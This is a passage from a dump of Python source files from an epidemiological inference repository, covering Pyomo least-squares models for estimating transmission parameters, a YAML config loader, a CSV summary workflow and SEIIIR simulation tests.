m.b[i].beta.value == True:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).'}\n\n for i in m.A:\n #print(\"BETA\", populations.index[i], value(m.b[i].beta))\n if not m.b[i].beta.stale:\n est_beta[ populations.index[i] ] = value(m.b[i].beta)\n\n cm_rep_cases_node = [v[0] for v in cm_rep_cases.iloc[:, [0] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=populations.iloc[0],\n sigma=sigma,\n gamma=gamma/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n for j, o in m.omega.items():\n #print(\"OMEGA\", Cdates[j], dates[j], value(m.omega[j]))\n if not o.stale:\n est_omega[ dates[j] ] = value(o)\n\n return {'est_beta': est_beta, 'est_omega':est_omega, 'status': 'ok', 'msg': 'Optimal solution found'}\n\ndef create_inference_formulation_multibeta_singleomegawin_decay_lsq(Cdates, cumulative_reported_cases, populations, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, loglsq=False, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. 
The model is written in terms of absolute\n numbers of cases (not ln-transform). \n\n The model combines computes a different beta value for each time series, using a common set of \n omega factors to describe the changes in beta over time for all counties.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n #if len(analysis_window) != 0:\n # raise NotImplementedError('analysis_window is not yet implemented for multibeta_singleomega_decay_lsq')\n window = int(analysis_window.get('days',1))\n assert(window >= 1)\n\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n\n #\n # We assume that all counties have the same number of time steps\n #\n # TODO: This should be checked in inference.py\n #\n model.timesteps = [i for i in range(len(Cdates)-1)]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n\n model.omega_timesteps = [i+window-1 for i in range(len(Cdates)-window)]\n model.omega = pe.Var(model.omega_timesteps, initialize=1.3, bounds=(0,1)) # transmission parameter\n\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = float(populations.iloc[nodeid]) # overall population\n\n cm_rep_cases_node = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=B.N,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n\n # Q: Is there a better way to do this?\n TIMES = model.TIMES\n\n # transmission parameter\n B.beta = pe.Var(initialize=1.3, bounds=(0,None))\n # the case count variables\n B.T_hat = pe.Var(TIMES, initialize=1.0)\n\n # infection process\n #def _infection_process(b, t):\n # return b.T_hat[t] == B.beta * model.omega[t] * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n #B.infection_process = pe.Constraint(TIMES, 
rule=_infection_process)\n\n B.infection_process = pe.ConstraintList()\n for t in model.omega_timesteps:\n for offset in range(window):\n tau = t-offset\n rhscoef = (I1[tau] + I2[tau] + I3[tau]) * S[tau] / B.N \n if rhscoef > 0:\n B.infection_process.add( B.T_hat[tau] >= B.beta * model.omega[t] * rhscoef - T[t])\n B.infection_process.add( B.T_hat[tau] >= T[t] - B.beta * model.omega[t] * rhscoef)\n\n # least squares objective function\n def _lse(b):\n return sum( b.T_hat[t]**2 for t in TIMES)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n return model\n\n" }, { "alpha_fraction": 0.4928637146949768, "alphanum_fraction": 0.49516573548316956, "avg_line_length": 33.19684982299805, "blob_id": "0ebd44de7ea82f611359d0e1d4f84c5a09f0149c", "content_id": "aa7f8108164b91bcc2a5d8542904a0c90f6fcebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4344, "license_type": "no_license", "max_line_length": 127, "num_lines": 127, "path": "/epi_inference/engine/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['factorial_iterator', 'load_configfile']\n\nimport sys\nimport itertools\nimport string\nimport yaml\nfrom pyutilib.misc import Options\n\nfrom .config_parameters import get_config_parameters, set_config_parameters\n\n\ndef _safe_eval(value, levels):\n tmp = string.Template(value).safe_substitute(**levels)\n try:\n return int(tmp)\n except:\n try:\n return float(tmp)\n except:\n pass\n return tmp\n\ndef _eval(value, levels, other_values):\n tmp = string.Template(value).safe_substitute(**levels)\n tmp = string.Template(tmp).substitute(**other_values)\n try:\n return int(tmp)\n except:\n try:\n return float(tmp)\n except:\n pass\n return tmp\n\n\ndef factorial_iterator(factors, config, other_values={}):\n assert(config.get('factor_levels',None) is None)\n\n factor_names = list(sorted(factors.keys()))\n factor_list = list(factors[f] for f in factor_names)\n for fac_ in itertools.product(*factor_list):\n levels = {}\n CONFIG = Options()\n for i in range(len(fac_)):\n levels[factor_names[i]] = str(fac_[i])\n #CONFIG[factor_names[i]] = fac_[i]\n for key, value in config.items():\n if type(value) is str and '${' in value:\n CONFIG[key] = _eval(value, levels, other_values)\n elif type(value) is dict:\n CONFIG[key] = Options()\n for _key, _value in value.items():\n if type(_value) is str and '${' in _value:\n CONFIG[key][_key] = _eval(_value, levels, other_values)\n else:\n CONFIG[key][_key] = _value\n else:\n CONFIG[key] = value\n\n CONFIG.factors = None\n CONFIG.factor_levels = levels\n #\n # Yield a tuple with a modified configuration object\n #\n yield CONFIG\n\n\ndef yaml_parser__load_yaml_data(loader, node):\n value = loader.construct_scalar(node)\n value = string.Template(value).substitute(**get_config_parameters())\n with open(value, 'r') as INPUT:\n return yaml.load(INPUT, Loader=yaml.Loader)\n\n\ndef load_configfile(config_file):\n yaml.add_constructor(u'!LoadYAMLFile', yaml_parser__load_yaml_data)\n set_config_parameters({})\n\n with open(config_file, 'r') as INPUT:\n try:\n first = True\n configs = []\n for config in yaml.load_all(INPUT, Loader=yaml.Loader):\n if first:\n first = False\n for key in config:\n if type(config[key]) in [list, dict]:\n configs.append(config)\n break\n if len(configs) == 1:\n continue\n #\n # It looks like this is a 
config block\n # process is *now*, before the workflow block\n # is processed.\n #\n # NOTE: This iterates at most 10 times trying to\n # replace strings, and then gives up.\n #\n parameters = config\n counter=10\n while counter > 0:\n flag=True\n tmp = {}\n for key,value in parameters.items():\n if type(value) is str and '${' in value:\n tmp[key] = _safe_eval(value, parameters)\n flag = False\n else:\n tmp[key] = value\n parameters = tmp\n if flag:\n break\n counter = counter - 1\n set_config_parameters(parameters)\n else:\n configs.append(config)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file '%s'\" % config_file)\n print(exc)\n sys.exit(1)\n #\n # Error checks\n #\n if len(configs) != 1:\n raise RuntimeError(\"Problem loading configuration file. Can only process a YAML file with one or two YAML documents.\")\n return configs[0]\n\n" }, { "alpha_fraction": 0.530515193939209, "alphanum_fraction": 0.5360634326934814, "avg_line_length": 32.486724853515625, "blob_id": "2826077b01a67aa3fb2f5ec2129f164205ec9306", "content_id": "8da338c8a7a47cf0cd3bf843fd4599b7696f8263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3785, "license_type": "no_license", "max_line_length": 138, "num_lines": 113, "path": "/epi_inference/reconstruction/recon_summary_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_summary']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport glob\nimport numpy as np\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef summary_narrow(OUTPUT, input_json_files, scenario_index, counties):\n counties = set(counties)\n first = True\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n data = {}\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values or key == 'dates':\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n values.remove(scenario_index)\n OUTPUT.write(\"fips,\"+\",\".join(values)+\",date,series,mean,Q25,Q50,Q75\")\n OUTPUT.write(\"\\n\")\n first=False\n\n for fips in counties:\n if not fips in raw:\n continue\n _value = tuple(raw[fips][val] for val in values)\n for d in range(len(raw[fips]['dates'])):\n for s in series:\n dateval = raw[fips]['dates'][d]\n if (fips,_value,dateval) not in data:\n data[fips,_value,dateval] = {}\n if s not in data[fips,_value,dateval]:\n data[fips,_value,dateval][s] = []\n data[fips,_value,dateval][s].append( float(raw[fips][s][d]) )\n\n sys.stdout.write(\".\")\n sys.stdout.write(\"\\n\")\n\n for key in sorted(data.keys()):\n fips, _value, d = key\n\n for s in series:\n vals = data[key][s]\n mean = np.mean(vals)\n quartiles = np.quantile(vals, [0.25, 0.5, 0.75])\n\n prefix = list(map(str,[fips]+list(_value)+[d,s]))\n results = [str(mean), str(quartiles[0]), str(quartiles[1]), str(quartiles[2])]\n OUTPUT.write(\",\".join(prefix + results))\n 
OUTPUT.write(\"\\n\")\n\n\ndef recon_summary(input_json_files, output_csv, scenario_index, counties=None):\n # Write CSV file\n print(\"Writing reconstruction summary: \"+output_csv)\n\n with open(output_csv,'w') as OUTPUT:\n summary_narrow(OUTPUT, input_json_files, scenario_index, counties)\n\n\nclass Recon_Summary_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_summary\",\n \"Summarize reconstructions in a CSV file.\")\n\n def validate(self, CONFIG):\n valid_options = set(['scenario_index', 'input_json', 'output_csv', 'counties', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_summary(\n CONFIG['input_json'],\n counties=CONFIG.get('counties',[]),\n output_csv=CONFIG['output_csv'],\n scenario_index=CONFIG['scenario_index'])\n\n\nregister_task(Recon_Summary_Workflow())\n\n" }, { "alpha_fraction": 0.36374202370643616, "alphanum_fraction": 0.6812484264373779, "avg_line_length": 57.76585388183594, "blob_id": "c9190a1420aae6d5959c7887cf6eede8eb53213d", "content_id": "64238419951c28b1a665161fe33eeb79b73e4e3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12047, "license_type": "no_license", "max_line_length": 469, "num_lines": 205, "path": "/epi_inference/simulation/tests/test_simulation.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\n\ndef test_simulate_discrete_seiiir_deterministic():\n \"\"\"\n Test a short simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 1, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n beta = 1\n rho = 1\n report_delay = 7\n tf=10\n\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=None)\n\n C = results.cumulative_reported_cases.values\n Cdates = results.cumulative_reported_cases.dates\n SEIIIR = results.SEIIIR\n \n assert len(Cdates) == len(SEIIIR.dates)+1\n delta = Cdates[1] - SEIIIR.dates[0]\n assert delta.days == report_delay\n assert SEIIIR.S[0] == 1000000\n assert SEIIIR.E[0] == 0\n assert SEIIIR.I1[0] == 1\n assert SEIIIR.I2[0] == 0\n assert SEIIIR.I3[0] == 0\n assert SEIIIR.R[0] == 0\n assert SEIIIR.transmissions[0] == 1\n assert C[0] == 0\n\n assert SEIIIR.S[1] == 1000000-1\n assert SEIIIR.E[1] == 1\n assert SEIIIR.I1[1] == pytest.approx(0.25)\n assert SEIIIR.I2[1] == pytest.approx(0.75)\n assert SEIIIR.I3[1] == 0\n assert SEIIIR.R[1] == 0\n assert SEIIIR.transmissions[1] == pytest.approx(1.0*999999/1000000)\n\n expS = [1000000, 999999.0, 999998.000001, 999996.8000034, 999995.661882242, 999994.3121701872, 999992.5550166771, 999990.288982791, 999987.4325757417, 999983.8563387465]\n expE = [0, 1.0, 1.799999, 2.6399968000011995, 3.2501185980054688, 3.949806933169381, 4.916999056689872, 6.199633131502013, 7.8161135545123095, 9.829127838741329]\n expI1 = [1, 0.25, 0.2625, 0.4256247999999999, 0.63440556000024, 0.808625109601154, 0.9921176640341648, 1.2314292273465157, 1.5477839331370316, 1.9501686941867198]\n expI2 = [0, 0.75, 0.375, 0.290625, 0.3918748499999999, 0.5737728825001799, 0.7499120528259104, 0.9315662612321013, 
1.1564634858179121, 1.4499538213072518]\n expI3 = [0, 0.0, 0.5625, 0.421875, 0.32343750000000004, 0.37476551249999995, 0.5240210400001349, 0.6934392996194666, 0.8720345208289425, 1.0853562445706697]\n expR = [0, 0.0, 0.0, 0.421875, 0.73828125, 0.9808593750000001, 1.261933509375, 1.654949289375101, 2.175028764089701, 2.829054654711408]\n expT = [1.0, 0.999999, 1.1999976000011998, 1.1381211580045094, 1.349712054765006, 1.7571535101543665, 2.2660338861501166, 2.856407049310699, 3.5762369951314814, 4.485406348014979]\n expC = [0, 1.0, 1.9999989999999999, 3.1999966000011995, 4.338117758005708, 5.6878298127707145, 7.444983322925081, 9.711017209075198, 12.567424258385897, 16.14366125351738, 20.62906760153236]\n\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\n # test the reporting factor\n rho = 8\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=None)\n SEIIIR = results.SEIIIR\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(1/8*np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\ndef test_simulate_discrete_seiiir_deterministic_tx():\n \"\"\"\n Test a short simulation with the seiiir deterministic model including\n transmission from outside\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n beta = 1\n rho = 1\n report_delay = 7\n tf=30\n tx = [0]*tf\n tx[10] = 1\n \n results = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n Cdates = results.cumulative_reported_cases.dates\n C = results.cumulative_reported_cases.values\n SEIIIR = results.SEIIIR\n\n assert len(Cdates) == len(SEIIIR.dates)+1\n delta = Cdates[1] - SEIIIR.dates[0]\n assert delta.days == report_delay\n assert SEIIIR.S[0] == 1000000\n assert SEIIIR.E[0] == 0\n assert SEIIIR.I1[0] == 0\n assert SEIIIR.I2[0] == 0\n assert SEIIIR.I3[0] == 0\n assert SEIIIR.R[0] == 0\n assert SEIIIR.transmissions[0] == 0\n assert C[0] == 0\n\n assert SEIIIR.transmissions[10] == 1\n assert SEIIIR.S[11] == 1000000-1\n assert SEIIIR.E[11] == 1\n assert SEIIIR.I1[11] == 0\n assert SEIIIR.I2[11] == 0\n assert SEIIIR.I3[11] == 0\n assert SEIIIR.R[11] == 0\n\n\n assert SEIIIR.transmissions[11] == 0\n assert SEIIIR.S[12] == 1000000-1\n assert SEIIIR.E[12] == pytest.approx(0.8)\n assert SEIIIR.I1[12] == pytest.approx(0.2)\n assert SEIIIR.I2[12] == 0\n assert SEIIIR.I3[12] == 0\n assert SEIIIR.R[12] == 0\n\n t = 
0.2*999999/1000000\n assert SEIIIR.transmissions[12] == pytest.approx(t)\n assert SEIIIR.S[13] == pytest.approx(1000000 - 1 - t)\n assert SEIIIR.E[13] == pytest.approx(0.8 - 0.8*1/5 + 0.2)\n assert SEIIIR.I1[13] == pytest.approx(0.2 + 0.8*1/5 - 0.2*3*1/4)\n assert SEIIIR.I2[13] == pytest.approx(0.2*3*1/4)\n assert SEIIIR.I3[13] == 0\n assert SEIIIR.R[13] == 0\n\n expT = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.1999998, 0.35999956800007205, 0.5279991363203962, 0.6500234843491176, 0.7899611612071538, 0.9833997294942862, 1.2399269425355373, 1.5632238454281848, 1.9658282341630997, 2.4697471508748774, 3.103237816906961, 3.9001484736462553, 4.902027026250278, 6.161128231301663, 7.743451993146161, 9.732090520466189, 12.231436853410257, 15.372620496106643]\n expS = [1000000, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 999999.0, 999999.0, 999998.8000002, 999998.4400006321, 999997.9120014957, 999997.2619780113, 999996.4720168501, 999995.4886171207, 999994.2486901782, 999992.6854663327, 999990.7196380985, 999988.2498909476, 999985.1466531307, 999981.246504657, 999976.3444776307, 999970.1833493994, 999962.4398974063, 999952.7078068858, 999940.4763700324]\n expE = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.0, 0.8, 0.8399998000000001, 1.0319994080000723, 1.353598662720454, 1.7329024145254808, 2.1762830928275383, 2.724426203756317, 3.419467905540591, 4.298798169860658, 5.404866770051626, 6.793640566916178, 8.538150270439903, 10.730668689998177, 13.48656197824882, 16.95037781390072, 21.303754244266738, 26.77509391587958, 33.651511986113924]\n expI1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.21000000000000002, 0.22049996, 0.2615248716000145, 0.3361009504440945, 0.4306057205161198, 0.5429080486945377, 0.6806122529248979, 0.8540466443393429, 1.0732712950569674, 1.349291177774567, 1.6960509078268777, 2.1316427810447003, 2.6790444332608105, 3.367073503964967, 4.2318439387713855, 5.3187118335461925, 6.6846967415624645]\n expI2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.15000000000000002, 0.19500000000000003, 0.21412497000000005, 0.2496748962000109, 0.3144944368830736, 0.4015778996078582, 0.5075755114228678, 0.6373530675493905, 0.7998732501418546, 1.0049217838281892, 1.2631988292879723, 1.5878378881921515, 1.9956915578315628, 2.508206214403499, 3.1523566815746, 3.9619721244721893, 4.979526906277692]\n expI3 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11250000000000002, 0.17437500000000003, 0.20418747750000005, 0.2383030415250082, 0.2954465880435573, 0.375045071716783, 0.4744429014963466, 0.5966255260361295, 0.7490613191154234, 0.9409566676499976, 1.1826382888784785, 1.4865379883637333, 1.8684031654646056, 2.3482554521687757, 2.9513313742231433, 3.709311936909928]\n expR = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.084375, 0.21515625000000002, 0.368296858125, 0.5470241392687561, 0.768609080301424, 1.0498928840890112, 1.405725060211271, 1.853194204738368, 2.4149901940749356, 3.1207076948124337, 4.007686411471292, 5.122589902744092, 6.523892276842547, 8.28508386596913, 10.498582396636486]\n expC = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.1999998, 1.559999368000072, 2.0879985043204683, 2.738021988669586, 3.5279831498767398, 4.511382879371026, 5.751309821906563, 7.314533667334748, 9.280361901497848, 11.750109052372725, 14.853346869279687, 18.75349534292594, 23.655522369176218, 29.81665060047788, 37.560102593624045, 47.29219311409023, 59.52362996750049, 
74.89625046360713]\n\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expC), np.asarray(C))\n\n # test the reporting factor\n rho = 8\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=tx)\n SEIIIR = results.SEIIIR\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(1/8*np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\ndef test_simulate_discrete_seiiir_deterministic_larger():\n \"\"\"\n Test a longer simulation with the seiiir deterministic model and verify\n the end conditions\n \"\"\"\n N = 1000\n y0={'S': N, 'E': 5, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n rho = 1\n report_delay = 7\n tf=1000\n \n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=None)\n C = results.cumulative_reported_cases.values\n T = results.SEIIIR.transmissions\n S = results.SEIIIR.S\n E = results.SEIIIR.E\n I1 = results.SEIIIR.I1\n I2 = results.SEIIIR.I2\n I3 = results.SEIIIR.I3\n R = results.SEIIIR.R\n assert sum(T) == results.cumulative_reported_cases.values[-1]\n C,T,S,E,I1,I2,I3,R = roundall(C,T,S,E,I1,I2,I3,R)\n \n assert C[-1] == R[-1]-5\n assert S[-1] == N - R[-1]+5\n assert E[-1] == 0\n assert I1[-1] == 0\n assert I2[-1] == 0\n assert I3[-1] == 0\n" }, { "alpha_fraction": 0.7622950673103333, "alphanum_fraction": 0.7622950673103333, "avg_line_length": 19.33333396911621, "blob_id": "4c44552b4846007d1c9f66d77ce2e9ecc643a81a", "content_id": "e8d1fbd19a19c0493128f3e81c17cc860b33fa6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/epi_inference/collect/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.collect\n\nfrom . import load_results\nfrom . import misc\nfrom . import casedata_wf\nfrom . 
import expdata_wf\n" }, { "alpha_fraction": 0.6370334029197693, "alphanum_fraction": 0.64833003282547, "avg_line_length": 42.3138313293457, "blob_id": "b641a26c4111b13ac5444f0bb596472dc851d0aa", "content_id": "b8ff465c8eafbdbf1bb9707b03c8bcf9b342fc19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8144, "license_type": "no_license", "max_line_length": 199, "num_lines": 188, "path": "/epi_inference/formulations/attic/multinode_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . import reconstruction as recon\n\ndef run_multinode_decay_lsq(cm_rep_cases, populations, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multinode_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n)\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).'}\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found'}\n\ndef create_inference_formulation_multinode_decay_lsq(Cdates, cumulative_reported_cases, populations, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). 
